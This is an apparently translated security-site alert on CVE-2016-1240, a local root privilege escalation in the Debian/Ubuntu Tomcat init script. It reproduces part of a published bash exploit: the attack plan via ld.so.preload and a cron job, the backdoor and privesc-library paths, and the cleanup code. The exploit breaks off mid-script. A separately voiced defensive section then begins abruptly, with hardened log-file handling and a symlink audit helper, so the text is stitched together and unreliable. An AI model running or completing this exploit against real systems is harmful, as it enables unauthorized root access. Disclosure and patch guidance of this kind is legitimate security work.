Vulnerability alert: Tomcat local privilege escalation vulnerability CVE-2016-1240 disclosed, with reference PoC - Exploit alerts - 黑吧安全网

ID MYHACK58:62201679941
Type myhack58
Reporter Anonymous
Modified 2016-10-08T00:00:00


Just as everyone was celebrating National Day, a local privilege escalation vulnerability in Tomcat, CVE-2016-1240, was disclosed on October 1. With nothing more than a low-privileged Tomcat user, an attacker can use the vulnerability to obtain system ROOT privileges, and exploitation is not difficult, so affected users need to pay special attention.

Tomcat is an application server from Apache and a container for running Servlet/JSP applications. It can be regarded as an extension of Apache, but in fact Tomcat can also run independently of Apache.

Vulnerability ID: CVE-2016-1240

Affected range: Tomcat 8, Tomcat 7, Tomcat 6

Affected systems: Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected.

Fix: The Debian security team has fixed the affected packages; update to the latest version of the Tomcat package provided by your distribution.

Vulnerability overview: Administrators of Debian-based Linux systems typically manage packages with apt-get. CVE-2016-1240 is a problem in the Tomcat deb package: when the deb package installs Tomcat, it automatically installs, as root, the startup script /etc/init.d/tomcat*. Through this script, an attacker can go from the low-privileged tomcat user to system root permission!

The affected part of the init script:

# Run the script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

A local attacker running as the tomcat user (a foothold obtained, for example, through a web application vulnerability) can replace catalina.out with a symbolic link to any file on the system. When the service is restarted, the Tomcat init script runs as ROOT and opens catalina.out again, and the attacker can obtain ROOT privileges.

Vulnerability PoC:

#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
#
# This exploit targets the Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
#
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./ path_to_catalina.out [-deferred]
#
# The exploit can be used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as the Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
#
# For testing purposes only. Do no harm.
#

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
	echo -e "\n[+] Cleaning up..."
	rm -f $PRIVESCSRC
	rm -f $PRIVESCLIB
	rm -f $TOMCATLOG
	touch $TOMCATLOG
	if [ -f /etc/ld.so.preload ]; then
		echo -n > /etc/ld.so.preload 2>/dev/null
	fi
	echo -e "\n[+] Job done. Exiting with code $1 \n"
	exit $1
}

function ctrl_c() {
	echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
	cleanexit 0
}

echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

if [ $# -lt 1 ]; then
	echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
	exit 3
fi
if [ "$2" = "-deferred" ]; then
	mode="deferred"
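The root cause shown in the init-script fragment above is that touch and chown follow symbolic links, so a tomcat-owned symlink named catalina.out gets its target handed to the tomcat user when root runs the script. The shell functions below are an added example, not code from the advisory, the exploit or the Debian tomcat packages: prepare_log_file is a hardened replacement for that touch/chown step, and find_symlinked_logs is an audit helper for a logs directory; both function names are my own.

```bash
#!/bin/bash
# Hardened replacement for the vulnerable init-script step
#   touch "$CATALINA_BASE"/logs/catalina.out
#   chown $TOMCAT7_USER "$CATALINA_BASE"/logs/catalina.out
# Both of those commands dereference symlinks; the function below does not.

# prepare_log_file PATH OWNER
# Create PATH if it does not exist and give it to OWNER, refusing when PATH
# is a symbolic link or any other non-regular file. Returns 0 on success,
# non-zero when it refused or a command failed.
prepare_log_file() {
    path="$1"; owner="$2"
    if [ -L "$path" ]; then
        echo "refusing to touch $path: it is a symbolic link" >&2
        return 1
    fi
    if [ -e "$path" ] && [ ! -f "$path" ]; then
        echo "refusing to touch $path: not a regular file" >&2
        return 1
    fi
    if [ ! -e "$path" ]; then
        # noclobber opens with O_EXCL, so the create fails instead of
        # following a link planted between the checks above and this line
        ( set -o noclobber; : > "$path" ) 2>/dev/null || return 1
    fi
    # -h (no-dereference): if a link was swapped in anyway, only the link's
    # own ownership changes, never that of the file it points to
    chown -h "$owner" "$path" || return 1
}

# find_symlinked_logs DIR
# List symbolic links sitting directly in a Tomcat logs directory: a
# symlinked catalina.out is exactly what this exploit leaves behind.
find_symlinked_logs() {
    find "$1" -maxdepth 1 -type l
}
```

Run the audit helper against each $CATALINA_BASE/logs on a host that has not yet been updated; an empty result is the expected state.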
